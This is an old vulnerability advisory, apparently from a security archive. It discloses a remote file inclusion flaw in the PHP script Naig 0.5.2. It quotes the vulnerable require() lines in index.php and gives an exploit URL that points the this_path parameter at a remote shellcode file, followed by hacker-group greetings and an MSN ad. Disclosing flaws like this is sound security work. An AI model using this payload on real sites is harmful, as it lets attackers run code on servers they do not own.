Naig <= 0.5.2 (this_path) Remote File Include Vulnerability

2007-01-13T00:00:00
ID SECURITYVULNS:DOC:15717
Type securityvulns
Reporter Securityvulns
Modified 2007-01-13T00:00:00

Description

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Naig <= 0.5.2 (this_path) Remote File Include Vulnerability

Script : Naig

Version : 0.5.2

URL : http://mesh.dl.sourceforge.net/sourceforge/naig/naig-0.5.2.zip

Found By : -= BorN To K!LL =-

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

code in : index.php

    require&#40;$this_path.&quot;config.inc.php&quot;&#41;;
    require&#40;$this_path.&quot;Naig-includes/naig.inc.php&quot;&#41;;

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Exlo!t :. ^^^^ www.site.com/[path]/index.php?this_path=shellcode.txt?

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

GreeTz to : Dr.2 , Asbmay , ToOoFa , Q8^RoCK , SHiKaA .... All My friends ..

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=


Express yourself instantly with MSN Messenger! Download today it's FREE! http://messenger.msn.click-url.com/go/onm00200471ave/direct/01/